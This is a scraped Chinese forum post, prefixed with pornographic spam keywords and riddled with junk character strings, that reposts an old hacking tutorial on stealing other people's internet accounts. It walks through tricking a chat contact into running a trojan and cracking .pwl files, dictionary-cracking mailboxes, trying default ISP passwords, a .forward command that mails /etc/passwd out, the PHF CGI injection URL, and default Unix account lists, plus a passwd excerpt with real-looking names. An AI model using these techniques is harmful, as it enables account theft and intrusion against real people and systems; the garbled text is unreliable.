久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖

      <small id="r7w9x"></small>

          <td id="r7w9x"></td><sub id="r7w9x"><menu id="r7w9x"><samp id="r7w9x"></samp></menu></sub>
        2. 

          4. <th id="r7w9x"></th>
          1. 

            汶上信息港
            
標題: 如何得到別人的上網(wǎng)帳號和密碼 [打印本頁]
            

            
作者: 雜七雜八    時間: 2011-1-12 21:03
            
標題: 如何得到別人的上網(wǎng)帳號和密碼
            如何得到別人的上網(wǎng)帳號和密碼,我在這里介紹幾種弱智方法。  y) m% p/ F& ~5 C
            
方案一:利用特洛伊木馬得到帳號。必備工具:NTESPY、PWLVIEW。7 i* B0 q9 Y. S$ j5 H
            
優(yōu)點:只要對方運行了程序就有80%的成功率,而且不需要任何網(wǎng)絡(luò)入侵知識,只要能熟悉的操作上面兩個軟件即可。NETSPY是全中文軟件,一看就會。而PWLVIEW又是弱智操作只要在DOS下輸入PWLVIEW然后按回車即可。成功率高,操作簡單而且用不了多長時間是它最大的優(yōu)點,只是......
            
- h. O6 }: G2 a$ J. i! N缺點:只有一個,那就是如何讓對方乖乖的運行你的程序。5 H, J& R$ R# o4 W& `
            
提示:先問清你的目標和你是不是在一個城市。
            
: t5 J! L3 ]' N' I6 u+ E實戰(zhàn)演戲:一天,我在X海聊天室里尋找目標,遇見了同在北京的色鵝丟丟。我上前打招呼:丟丟好呀。丟丟說:你好呀。我又說:XXXXXXX(客套話,先和他拉關(guān)系)對了,我拿到了一個新程序,要不要看看?丟丟說:好呀,寄給我吧。
            
5 u  s  ~, d# ]哈哈,魚上鉤了!先把誘餌程序改個名,如改成readme之類的東東,然后和一些不相干的東西發(fā)過去,然后你讓他先運行README。在這插一句,有一位大俠使用此法時,竟然把控制端程序和NETSPY的說明文件一起發(fā)了過去,真搞不懂他怎么想的。我對他說,你先運行README,是中文說明。丟丟說:好...咦,怎么沒反映呀?(YEAH!)我又說:那你直接運行軟件吧。丟丟說:好吧...不錯...我說:明天見...開始干活,連上他的機子后,現(xiàn)在C盤里找到了WIN95的目錄WINDOWS。也有可能是WIN95或WIN98,進入后查找*.pwl,然后把所有后綴名為PWL的文件都抓過來,放在你的工具PWLVIEW的子目錄里。在DOS窗口下輸入PWLVIEW然后敲回車,丟丟的上網(wǎng)帳號和密碼就都顯示出來了。而且以后如果他上網(wǎng),NETSPY就會通知你,他就再也逃不出你的手掌心了。就算是他換了密碼,你也能在2分鐘內(nèi)再把他搞定。
            
; p3 r- ?6 v* U; B$ ^忠告:你用他的帳號上網(wǎng)后第一件事就是先去查看他的上網(wǎng)時間。分析一下他一般幾點上網(wǎng)以避免撞車。
            
- |1 b' [9 F  X5 }方案二:利用ISP的疏忽做文章舉。例用工具:EMAILCRK或網(wǎng)絡(luò)刺客$ [% C: [; A! g; O& u5 a; U
            
優(yōu)點:沒什么優(yōu)點
            
- S4 s# ^) B8 g缺點:要具體情況具體對待,太麻煩, i2 p6 L" Z# C/ i, k" `. f
            
提示:平時多多留神。1 C7 y/ h% J8 O8 X6 ~
            
譬如,某個ISP給你開好了帳號,然后又畫蛇添足的給你一個郵箱,地址是:你的帳號@xxx.net  F2 Y0 O2 i# d4 h5 [. t$ |
            
密碼和你的上網(wǎng)密碼一樣。也就是說,只要你能敲開郵箱的密碼就一切OK了。
            
! T0 n1 p2 x8 O7 }( W4 ~" Z, J運行EMAILCRK或網(wǎng)絡(luò)刺客,套上字典后就等著。一般沒有XX個小時搞不定,不成功的可能性很大,而且破解時還必須要上網(wǎng)。你的機子要是快可以開上三四個窗口,套上不同的字典一起破: {% A3 H$ [, N
            
方案三:侵入郵局主機然后把PASS檔抓回來,然后用JOHN或JACK套上字典開始破。8 F& C% h# g* w* n: g+ w
            
優(yōu)點:一次可以破出好多帳號,而且如果運氣好還能拿到ROOT,這個主機就要歸你控制了。而且破解時不用上網(wǎng),可以好幾臺機子一起破。
            
0 e0 k3 N1 o2 F+ N& }- ^2 {缺點:對于初學者有一定困難,尤其是只想拿一個上網(wǎng)帳號這樣做恐怕會得不償失。而且被發(fā)現(xiàn)的可能性很大,情節(jié)嚴重且性質(zhì)惡劣,一定要慎重對待。
            
3 V/ w' s. n' J; M, N# J5 Q- L由于介紹此類的教學文章比較多,我就不班門弄斧了。 ; i( a6 q' p, h4 X4 N
            

            
* P+ L% v/ c- a哈哈,我來說說最簡單的入侵方法。其實入侵大體的原理相同,主要是利用系統(tǒng)的漏洞(BUG)來做文章。9 w" ~0 V6 k4 ^, O; b- f" a
            
只不過有的網(wǎng)站漏洞難找有的好找而已。一個好的黑客,就是要能很快的發(fā)現(xiàn)漏洞并加以利用。下面我給大家舉一個小栗子。
            
5 L' B3 x. V* ?' K- U( ~有一天,我去XX熱線申請主頁,發(fā)現(xiàn)那里采用的是機器自動回信,信的大概格式如下:
            
3 Q9 }% N( e7 Z9 P* A
            
" [) X& o2 F5 Z------------------------------
            
9 Z3 L. G. k; t  D
            
) Z6 R2 D9 ^$ b. X* B' l7 e( |XXX,你好(XX是你在表格上填的名字)
            
  K( H6 M9 T  }+ f3 c& X- T8 C你在XX熱線的主頁空間已開通3 R  S. g! d* g" P
            
帳戶名:XXX 密碼:112 g( B$ x6 x- d$ |# |3 ^
            
-----------XX熱線# e8 u0 F) C( v: S# A- M! a
            
電話:XXXX-XXXXXXXX
            
/ o2 j! y% s8 R3 T9 K7 _9 c------------------------------
            
9 A7 ]% o8 k0 W4 f& ~& ~3 n. T% I; ?! v
            
好了,由于是機器回信,所以那里所有人的初始密碼都是11,而且該熱線要更改密碼要TELNET到郵局主機去改,有許多網(wǎng)友并沒有接觸過如何T主機,所以他們使用的還是初始密碼11。; G6 |. A! [+ r3 s3 M, F! u- k
            
開始干活了,打開FTP軟件,輸入XX熱線的IP,密碼11,然后挨個輸入帳戶名。帳戶名可去XX熱線的主頁空間列表里查看,先試試AAAA,。。。沒成功,再換一個,AABB。。。還是不行。哈哈,這個用戶名短,沒準能行。輸入AA。。。進去了。寄下用戶名然后繼續(xù)試,ABC。。。又成功了,看來沒改密碼的人很多呀。試幾個就行了,現(xiàn)在,你已經(jīng)擁有這些帳戶的控制權(quán)了。8 B% c5 p$ E0 D% ?
            
上面的這個栗子很簡單,一般象這么大的漏很難找。要侵入一個稍微象點話的站臺就要耗費你大量的時間和金錢,而且還未必能成功。即使成功了,你不改它實在無趣,改了恐怕會步馬X的后塵。此人侵入貴陽的主機并把界面換成了一張淫穢圖片。害的自己吃飯不用花錢了。所以我在這里勸大家一句,把這方面的精力放到全心全意為人民服務(wù)上去。實在不行就去聊天室,看誰不聽話就炸他,同樣很過癮的!8 A4 J. E( ~; W2 N" A1 S1 ~' k
            
  
            
* s: y. z; |4 t
            
! R* M$ b3 X. {, w8 ]+ A, E                           如何獲得第一個帳號
            
9 ~- I3 a  g% n3 l: D& L4 Q; O7 L: w; ~7 [4 n
            
我們這種水平不高的黑客入侵都是先得到系統(tǒng)的一個有效帳號,進入后再利用系統(tǒng)BUG得到ROOT權(quán)限或想辦法得到SHADOW再解密.無論是利用系統(tǒng)漏洞還是得到SHADOW都是有一定規(guī)律可尋的,通常你到一些黑客站點找到對應(yīng)系統(tǒng)相應(yīng)版本的EXPLOIT編譯后執(zhí)行就行了.我感覺最困難的是獲得第一個有效的帳號,有時侯費盡力氣也得不到,后來總算是積累了一些經(jīng)驗,想寫出來和大家交流一下,希望能拋磚引玉,請高手們把更好的方法告訴我.
            
( z4 h8 E8 g3 k! d
            
0 F" F+ l8 h; Z. D! ?- I確定了目標以后,我通常是先用匿名FTP去看一下,許多網(wǎng)站都開匿名FTP,帳號用ANONYMOUS或是FTP,密碼用一個EMAIL帳號(當然是假的),進入后到/etc目錄下把PASSWD拿回來,一般情況下都是一份很不全的名單,只有幾個系統(tǒng)帳號,那就算白來了:-}但有的時候會有比較傻的管理員把一些普通帳號放進去,這就是很重要的信息,雖然只有帳號沒有密碼,但畢竟邁出了第一步.如果FTP主目錄是drwxr-xr-x,做一個.foward文件傳上去,在UNIX下的命令應(yīng)該是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后給匿名用戶寫一封信,它會把PASSWD發(fā)給你。
            
& ]3 i) y5 m- a) T4 T
            
! \. I9 x4 Y, B& y. X, E如果目標沒有匿名FTP,就通過WWW訪問它的主頁,看看上面有什么信息,例如通過一些聯(lián)系人的EMAIL你就可以發(fā)現(xiàn)一些帳號,有的網(wǎng)頁上甚至列出了EMAIL通訊錄,這對黑客來講就是無價之寶.把這些帳號記下來,非常有用.
            
2 m$ G  G3 b, m0 A9 \; \' N! x$ z! e! O
            
以上幾個方法都不行的話,那就試試PHF查詢.在瀏覽器的地址欄輸入http://攻擊目標/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的話會顯示出PASSWD來,但是成功率極低:-< 6 J5 N0 x+ d. e5 d0 f
            

            
* Y0 ]- v# D+ M7 e3 r6 I- J4 ~還可以利用目標的FINGER功能來積累帳號,如利用HAKTEK(一種掃描器)來監(jiān)視目標,一旦有人登陸該主機就會報告給你.但這種方法的缺點就是浪費時間,如果你是自己花錢上網(wǎng)的話可就要出血了!& R; i3 x1 ]) \
            

            
! F( H: e! D" e6 O: e很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系統(tǒng)默認的帳號,例如:
            
# P& B1 v% }0 C* T
            
7 J$ B# B; G% I$ E' U帳號     密碼- `9 Z' q' ]1 I
            
----------- ----------------
            
: }8 c, Q! ~0 o; Y  U$ C4 M9 vroot    root# M5 F" U& i9 Q5 v
            
sys     sys/system/bin1 y) i+ c) p$ E( d/ x7 E
            
bin     sys/bin! r) C9 Z; g' K6 e
            
mountfsys  mountfsys
            
8 x, D2 ^% C' l& uadm     adm2 A( l; _' c: f1 T0 m6 h8 w
            
uucp    uucp
            
# _  P* r  l. G" pnuucp    anon0 G0 \+ k7 B7 _7 \6 h
            
anon    anon
            
3 p' O# ~! l( G0 x( R$ ruser    user. c, `9 i; ]3 P; B! Q
            
games    games9 B" p2 }/ C9 A# C6 m* G
            
install   install
            
8 Y0 P! j9 i& o  N1 K' {$ Lreboot   給 "command login" 用的
            
" T8 W. J1 ^7 ~4 D; p0 kdemo    demo; j5 p7 S( m9 e% n' X
            
umountfsys umountfsys
            
2 @" l! b# d8 u! |" \+ r/ psync     sync# T" G+ N9 d$ B) x
            
admin    admin8 y' s% n1 N( N. ?6 P3 x; A
            
guest    guest
            
9 S' {! @" G4 b. I& I& Vdaemon   daemon
            
  x8 b0 n8 K% ^" z5 t: _  F1 d5 k________________________________________________________________, u: ~! i& `& y- C0 L, ~3 C
            

            
4 Z7 \! w, I# ]; F% ?& K有些管理員忘記把他們改掉,那你就發(fā)財了!
            
$ N2 p2 K* Y( U6 @3 m, N0 u) p/ D0 l
            
0 G. J) u. p+ |5 G% h8 `另外還有一些習慣性帳號如:test,www,html,web,oracle,setup,sybase,john,tom等也都應(yīng)該試一試.$ t2 X! j/ |6 `7 B& N0 [4 M' W
            
8 b5 s) a# u6 S* X! ~" }: l
            
只有帳號還不能進入系統(tǒng),但有了帳號搞密碼就容易一些了,主要辦法還是猜.如果是通過PASSWD知道帳號的那你應(yīng)該會發(fā)現(xiàn)該用戶的許多信息,例如:
            
6 S, p( m3 s* J6 ?3 J, c- Z% [- h  ]3 z; t8 A: M1 ]: j' E3 Y
            
.........
            
+ B2 g& G; ~; k) ^* v6 ?
            
3 v- A( u5 M0 e! Axlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh& a) \0 b( }0 M8 e( t
            
/ W/ o# n% L( R: A1 I0 F
            
qingyuan:x:275:50::/usr/qingyuan:/bin/sh+ _+ q$ P+ E5 ^% n8 d* h7 I
            
! }4 l8 X3 r+ `7 _
            
hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh
            
* D1 }4 V" [+ B
            
9 M" V1 q3 y; W; I" E1 Ismlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh( K0 `) u3 U/ d5 X* R7 `9 @
            
5 P. y( T$ C2 C2 S' ]+ W
            
kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh
            
3 o8 M7 j9 j( [/ Q1 M! a: @5 ^$ {8 A1 b
            
brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh- d8 _" u4 O  J7 }5 {$ N
            

            
3 L6 ~/ l7 s5 ?% A" W$ |1 v, Ltide:x:301:50:Wang XinYi:/usr/tide:/bin/sh
            
1 J; P& e  z$ W) l1 L+ ~
            
1 K7 Y/ {. n+ S2 `............
            
4 ?6 n2 m  Y3 ]" i  Y  @2 c+ @% ~  d4 b
            
這是一部分PASSWD,從這兒我們可以得到七個帳號,注意每一行的第五項,那是該用戶的真實姓名,對!就用它來做密碼試.成功率還是比較高的.
            
. y: x) g2 N, @, |% W
            
! K$ o: ~8 |  v3 G, o8 Q" \如果是用其他方法獲得帳號的,就用FINGER查詢來獲得相關(guān)信息.例如知道一個帳號support,我們就用網(wǎng)絡(luò)刺客II里的FINGER項來偵察support@xxx.xxx.xxx會獲得很多該帳號的信息例如真名實姓,電話號碼等就用這些做密碼來猜">如果是用其他方法獲得帳號的,就用FINGER查詢來獲得相關(guān)信息.例如知道一個帳號support,我們就用網(wǎng)絡(luò)刺客II里的FINGER項來偵察support@xxx.xxx.xxx會獲得很多該帳號的信息例如真名實姓,電話號碼等就用這些做密碼來猜.' m7 o, f) c" H
            

            
1 B3 V* O0 M/ Q3 c5 t. ~: m3 e當然最可能的密碼還是帳號本身和一些帳號的變形,如帳號是john,密碼可能是nhoj,john123,john888等.或是一些簡單數(shù)字.總之是要費一番工夫來猜的.' P4 i# @* B5 S% O3 K3 z
            
! H6 Z  f3 b6 ?) E* t/ @. h( W
            
如果還猜不出密碼,只好用LETMEIN之類的東西來猜,字典一定要好.否則,你的電話費就要.....而且這種方法比較危險,還是不用為好." _# T  ^$ q1 V% \2 c, ^
            

            
& Z1 ~  y# M6 n8 o. N; `最后實在不行還有一種比較卑劣的手段,就是給該網(wǎng)站的網(wǎng)管寫封信,想辦法騙他執(zhí)行特洛伊木馬,然后再.......算了,不說了.
            
9 ~0 \* V# A; L6 _2 n) X: X2 p6 K1 ]) ]+ ^: V8 t
            
你可能發(fā)現(xiàn)以上這些方法都不能百分之百的成功,或者說成功率是比較低的,因為我也不知道更好的方法.但我感到一定有一種更好的方法,希望有高手見到此文能告訴我.# h- M1 s* A) y# s' W
            

            
- H  r# M3 N+ ?( T3 k4 `




            

            

            歡迎光臨 汶上信息港 (http://m.junkejituan.com/)

Powered by Discuz! X3.5